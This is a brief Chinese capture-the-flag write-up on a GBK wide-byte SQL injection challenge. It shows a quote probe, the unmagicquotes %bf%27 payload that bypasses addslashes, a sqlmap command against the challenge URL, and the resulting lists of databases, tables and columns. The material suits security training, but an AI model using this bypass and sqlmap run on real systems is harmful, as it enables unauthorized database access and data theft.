http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

点进去就两句话，这么单调就先让我们看看html

好了。。。什么都没有

仔细一看，发现只有url里面可以注入了

随手一个 1'and'1'='1 上去

问题已经出来了哈，引号变成反斜杠了

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

其实从连接上也能看出来是 SQL-GBK了

sqlmap走一趟

这个时侯就要用另一个脚本了

脚本名：unmagicquotes.py

作用：宽字符绕过 GPC addslashes12345

Example:* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs

结果

available databases [2]:

[*] `sae-chinalover`

[*] information_schema

我们选择`sae-chinalover`

继续跑，相比于第一次，这次明显快很多

Database: sae-chinalover [5 tables]

+------+

| ctf |

| ctf2 |

| ctf3 |

| ctf4 |

| news |

+------+

很明显了，答案就在这几个里面

sqlmap跑

Database: sae-chinalover

Table: ctf2

[2 columns]

+---------+-------------+

| Column  | Type        |

+---------+-------------+

| content | non-numeric |

| id      | numeric    |

+---------+-------------+

别问我为什么跑ctf2，因为我已经跑完了。。

完了

服务器打不开了。。。。

不是封了我ip就是崩了

在注入题中，先手工一下，探探waf基本过滤规则，然后自行判断